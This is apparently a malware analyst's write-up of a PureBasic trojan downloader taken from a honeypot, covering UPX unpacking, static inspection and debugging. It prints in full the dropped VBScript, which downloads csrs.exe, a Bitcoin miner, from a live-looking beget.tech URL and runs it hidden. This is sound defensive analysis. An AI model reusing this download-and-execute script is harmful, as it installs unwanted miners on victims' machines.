An analysis of a Trojan Downloader I came across in one of my honeypots.
A quick analysis of the file using ProtectionID shows the file is packed with UPX, so lets unpack it quickly using the -d
flag which UPX provides.
Ultimate Packer for eXecutables Copyright (C) 1996 - 2017 UPX 3.94w Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017 File size Ratio Format Name -------------------- ------ ----------- ----------- 69632 <- 36352 52.21% win32/pe downloader.exe Unpacked 1 file.
Let check the file again in ProtectionID and see what it finds.
File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 69632 (011000h) Byte(s) | Machine: 0x14C (I386) Compilation TimeStamp : 0x588079E7 -> Thu 19th Jan 2017 08:33:43 (GMT) [TimeStamp] 0x588079E7 -> Thu 19th Jan 2017 08:33:43 (GMT) | PE Header | - | Offset: 0x00000088 | VA: 0x00400088 | - [File Heuristics] -> Flag #1 : 00000000000000001100000000000000 (0x0000C000) [Entrypoint Section Entropy] : 5.20 (section #0) ".code " | Size : 0x3063 (12387) byte(s) [DllCharacteristics] -> Flag : (0x0000) -> NONE [SectionCount] 5 (0x5) | ImageSize 0x15000 (86016) byte(s) [ModuleReport] [IAT] Modules -> KERNEL32.DLL | COMCTL32.DLL | GDI32.DLL | MSVCRT.dll | OLE32.DLL | SHELL32.DLL | SHLWAPI.DLL | USER32.DLL | WINMM.DLL [CompilerDetect] -> PureBASIC [!] File appears to have no protection or is using an unknown protection - Scan Took : 0.140 Second(s) [00000008Ch (140) tick(s)] [506 of 580 scan(s) done]
A pretty unusual sample, in the sense that it has been coded in PureBasic.
The good news is that there is no more obvious protection around the sample!
Using IDA, a quick survey of what imports and strings are used reveal a few interesting things.
1. .data:00412025 00000005 C .vbs
2. 004126C8 CreateFileA KERNEL32
3. 004126D0 WriteFile KERNEL32
The above 3 things are interesting given that .vbs
references a VBScript file and there are no networking functions in the imports itself – so it stands to reason that there is a script that will be written and executed at some point during the execution of the sample.
Lets focus on this idea, since it is possible that the the .vbs
file could be a major part of the infection process.
After a little bit of debugging I was able to extract the following VBScript file which the sample wrote to the %temp% folder: 0018FF78 01C15910 "C:\\Users\\MW\\AppData\\Local\\Temp\\CD84.tmp\\CD85.vbs"
.
The VBScript contains the following code:
Option Explicit Const ForReading = 1 Const ForWriting = 2 Dim ObjWMI, ColSettings, ObjProcessor,cpuminer,videocardminer,WshShell,objStdOut, cpucount Dim StrComputer, ObjNetwork, objFSO, objWMIService, architectura, proccores, gram,gpu, objItem, lool Set objStdOut = WScript.StdOut Set objFSO = CreateObject("Scripting.FileSystemObject") Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set ObjNetwork = WScript.CreateObject("WScript.Network") StrComputer = Trim(ObjNetwork.ComputerName) Set ObjNetwork = Nothing Set ObjWMI = GetObject("WINMGMTS:" & "{ImpersonationLevel=Impersonate,AuthenticationLevel=Pkt}!\\" & StrComputer & "\Root\CIMV2") Set ColSettings = ObjWMI.ExecQuery ("SELECT * FROM Win32_Processor") Set WshShell = WScript.CreateObject("WScript.Shell") cpuminer = false architectura = 0 videocardminer = false For Each ObjProcessor In ColSettings If ObjProcessor.ProcessorType = 3 OR ObjProcessor.ProcessorType = 2 Then cpuminer = true proccores = ObjProcessor.NumberOfLogicalProcessors videocardminer = false End If If ObjProcessor.ProcessorType = 4 OR ObjProcessor.ProcessorType = 6 Then cpuminer = false videocardminer = true End If If ObjProcessor.Architecture = 0 AND ObjProcessor.AddressWidth = 32 Then architectura=32 End If If (ObjProcessor.Architecture = 6 OR ObjProcessor.Architecture = 9) AND ObjProcessor.DataWidth = 64 AND ObjProcessor.AddressWidth = 32 Then architectura=32 End If If (ObjProcessor.Architecture = 6 OR ObjProcessor.Architecture = 9) AND ObjProcessor.DataWidth = 64 AND ObjProcessor.AddressWidth = 64 Then architectura=64 End If Next Sub HTTPDownload( myURL, myPath ) dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", myURL, False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile myPath, 2 '//overwrite end with End Sub Set ObjProcessor = Nothing: Set ColSettings = Nothing: Set ObjWMI = Nothing: StrComputer = vbNullstring If architectura=64 Then HTTPDownload "http://v91049e6.beget.tech/[email protected]/6/csrs.exe","./csrs.exe" End if If architectura=32 Then HTTPDownload "http://v91049e6.beget.tech/[email protected]/3/csrs.exe","./csrs.exe" End if WshShell.Run "csrs.exe", 0
Quite obviously, the script downloads a variation of a file named csrs.exe
and executes the downloaded file. One version if the system architecture is 32-bit and the other if it is 64-bit.
The downloaded file is a BitcoinMiner, but I am not going to go into that in this post.
References
Sample SHA-256: 6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c
Tools
- x64Dbg – http://x64dbg.com/
- VirusTotal – https://virustotal.com
- ProtectionID – https://pid.gamecopyworld.com/
- Yara – https://virustotal.github.io/yara/
- Hex-Rays IDA-Pro
Virus Total
Sample Analysis:
https://virustotal.com/en/file/6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c/analysis/
CSRS.exe Analysis:
https://virustotal.com/en/file/330174725c331dcb9e75aaf4aeeefd5ec97fb04f01630afa6dc3282e34acc2e8/analysis/